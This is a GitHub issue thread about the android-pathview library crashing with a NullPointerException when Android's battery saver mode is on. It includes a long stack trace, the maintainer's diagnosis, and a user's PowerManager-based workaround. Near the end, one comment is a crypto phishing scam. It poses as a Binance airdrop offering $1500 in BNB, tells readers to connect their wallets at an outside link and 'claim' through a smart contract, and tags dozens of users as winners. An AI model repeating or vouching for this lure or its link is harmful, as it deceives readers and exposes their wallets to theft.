### ISSUE TITLE
Crash on Battery Saver Mode

### ISSUE THREAD

**Issue by hdcoder** [geftimov/android-pathview#12]
Hi,
Once you have the project configured and running, It crashes when the phone is in Battery saving mode [android 5.1 ], Tested it on device Moto E 1st Gen android.

**Comment by geftimov** [comment]
Strange. I will test it and keep you posted.

**Comment by hdcoder** [comment]
Here is the Log :
java.lang.NullPointerException: Attempt to invoke virtual method 'android.graphics.RectF com.caverock.androidsvg.SVG.getDocumentViewBox()' on a null object reference
            at com.eftimoff.androipathview.SvgUtils.rescaleCanvas(SvgUtils.java:129)
            at com.eftimoff.androipathview.SvgUtils.drawSvgAfter(SvgUtils.java:76)
            at com.eftimoff.androipathview.PathView.fillAfter(PathView.java:216)
            at com.eftimoff.androipathview.PathView.onDraw(PathView.java:204)
            at android.view.View.draw(View.java:15249)
            at android.view.View.updateDisplayListIfDirty(View.java:14185)
            at android.view.View.getDisplayList(View.java:14207)
            at android.view.View.draw(View.java:14977)
            at android.view.ViewGroup.drawChild(ViewGroup.java:3407)
            at android.view.ViewGroup.dispatchDraw(ViewGroup.java:3200)
            at android.view.View.draw(View.java:15252)
            at android.view.View.updateDisplayListIfDirty(View.java:14185)
            at android.view.View.getDisplayList(View.java:14207)
            at android.view.View.draw(View.java:14977)
            at android.view.ViewGroup.drawChild(ViewGroup.java:3407)
            at android.view.ViewGroup.dispatchDraw(ViewGroup.java:3200)
            at android.view.View.updateDisplayListIfDirty(View.java:14180)
            at android.view.View.getDisplayList(View.java:14207)
            at android.view.View.draw(View.java:14977)
            at android.view.ViewGroup.drawChild(ViewGroup.java:3407)
            at android.view.ViewGroup.dispatchDraw(ViewGroup.java:3200)
            at android.view.View.updateDisplayListIfDirty(View.java:14180)
            at android.view.View.getDisplayList(View.java:14207)
            at android.view.View.draw(View.java:14977)
            at android.view.ViewGroup.drawChild(ViewGroup.java:3407)
            at android.view.ViewGroup.dispatchDraw(ViewGroup.java:3200)
            at android.view.View.updateDisplayListIfDirty(View.java:14180)
            at android.view.View.getDisplayList(View.java:14207)
            at android.view.View.draw(View.java:14977)
            at android.view.ViewGroup.drawChild(ViewGroup.java:3407)
            at android.view.ViewGroup.dispatchDraw(ViewGroup.java:3200)
            at android.view.View.updateDisplayListIfDirty(View.java:14180)
            at android.view.View.getDisplayList(View.java:14207)
            at android.view.View.draw(View.java:14977)
            at android.view.ViewGroup.drawChild(ViewGroup.java:3407)
            at android.view.ViewGroup.dispatchDraw(ViewGroup.java:3200)
            at android.view.View.draw(View.java:15252)
            at android.widget.FrameLayout.draw(FrameLayout.java:598)
            at com.android.internal.policy.impl.PhoneWindow$DecorView.draw(PhoneWindow.java:2650)
            at android.view.View.updateDisplayListIfDirty(View.java:14185)
            at android.view.View.getDisplayList(View.java:14207)
            at android.view.ThreadedRenderer.updateViewTreeDisplayList(ThreadedRenderer.java:273)
            at android.view.ThreadedRenderer.updateRootDisplayList(ThreadedRenderer.java:279)
            at android.view.ThreadedRenderer.draw(ThreadedRenderer.java:318)
            at android.view.ViewRootImpl.draw(ViewRootImpl.java:2560)
            at android.view.ViewRootImpl.performDraw(ViewRootImpl.java:2382)
            at android.view.ViewRootImpl.performTraversals(ViewRootImpl.java:2012)
            at android.view.ViewRootImpl.doTraversal(ViewRootImpl.java:1084)
            at android.view.ViewRootImpl$TraversalRunnable.run(ViewRootImpl.java:5990)
            at android.view.Choreographer$CallbackRecord.run(Choreographer.java:767)
            at android.view.Choreographer.doCallbacks(Choreographer.java:580)
            at android.view.Choreographer.doFrame(Choreographer.java:550)
            at android.view.Choreographer$FrameDisplayEventReceiver.run(Choreographer.java:753)
            at android.os.Handler.handleCallback(Handler.java:739)
            at android.os.Handler.dispatchMessage(Handler.java:95)
            at android.os.Looper.loop(Looper.java:135)
            at android.app.ActivityThread.main(ActivityThread.java:5343)
            at java.lang.reflect.Method.invoke(Native Method)
            at java.lang.reflect.Method.invoke(Method.java:372)
            at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:905)
            at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:700)

**Comment by geftimov** [comment]
I found the problem.
It is destroying the SVG object when trying to fill after.
I will fix it today and increase the version.

**Comment by hdcoder** [comment]
Sure that would be great ! (y)

**Comment by b3stia** [comment]
Hi, what about update? It will be great if u can make this :)

**Comment by waynesford** [comment]
Would love to see an update too!

**Comment by geftimov** [comment]
@hdcoder @b3stia @waynesford 
Hey I will fix , sorry for the delay (2 months).

I have a question though :
As VectorDrawable is up [VectorDrawable](https://developer.android.com/reference/android/graphics/drawable/VectorDrawable.html)

is it better to deprecate this library and create on for supporting PathVectorDrawable?

**Comment by waynesford** [comment]
Unfortunately, VectorDrawable is only available for API 21+. I think it's probably better to just fix this bug. We've been using your library in production for quite some time now, and it's worked great, this has been the only bug that's come up for us!

**Comment by Swati4star** [comment]
Getting same error on device with android version 4.4.4

**Comment by annshsingh** [comment]
Using this logic to handle this bug - 
```
PowerManager powerManager = (PowerManager)
            getActivity().getSystemService(Context.POWER_SERVICE);
    if (android.os.Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP
            && powerManager.isPowerSaveMode())
    {
        //Disable pathView here 
    }
```

**Comment by jmperezv** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @ZelnickB, @scoresofunderscores, @pratamawijaya, @kai18, @koehntopp, @Floresj4, @NazranKhondokar, @vcollado, @troyanov, @floriankammermann, @Konboi, @adamward-nrhl, @wuliang142857, @luizberti, @nelenkov, @venkatBala, @bolerovt, @d--j, @legerski, @ziyadparekh, @gilday, @terrascura, @denys-meloshyn, @messnoTrace, @kkriehl, @Abdulrasheed1729, @Pr0ce33, @iliaznk, @tqcq, @is0263rf, @Armour, @coldljy, @sayresVT, @fraggjkee, @hnq90, @vaad2, @Onur-KAVSUT, @odeke-em, @dmitriykovalev, @dyxushuai, @mqueiroz1995, @HueyGeek, @antoniodowling, @grushetsky, @godmac, @mustangxu, @monkeymosher, @YumcoderCom, @SahajR, @ccone1995

**Comment by ccone1995** [comment]
[自动回复]已收到来信。
